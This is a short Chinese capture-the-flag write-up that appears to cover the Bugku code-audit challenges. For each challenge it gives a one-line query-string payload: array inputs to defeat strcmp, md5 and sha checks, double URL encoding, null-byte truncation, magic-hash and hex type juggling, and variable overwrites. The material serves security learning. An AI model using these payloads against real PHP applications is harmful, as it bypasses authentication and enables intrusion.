Bugku-代码审计
https://ctf.bugku.com/challenges
1、extract变量覆盖
?flag=&shiyan=
2、strcmp比较字符串
?a[]=1
3、urldecode二次编码绕过
?id=%2568%2561%2563%256B%2565%2572%2544%254A
4、md5()函数
?username[]=1&password[]=2
5、数组返回NULL绕过
?password[]=1
?password=aA0%00--
6、弱类型整数大小比较绕过
?password[]=1
7、sha()函数比较绕过
?name[]=1&password[]=2
8、md5加密相等绕过
?a=s878926199a
9、十六进制与数字比较
?password=0xdeadc0de
10、变量覆盖
?a=&b=
11、ereg正则%00截断
?password[]=1
?password=1e9%00*-*
12、strpos数组绕过
?ctf[]=1
?ctf=1%00%23biubiubiu
13、数字验证正则绕过
42.00e+00000000000
14、简单的waf
打不开。
网友评论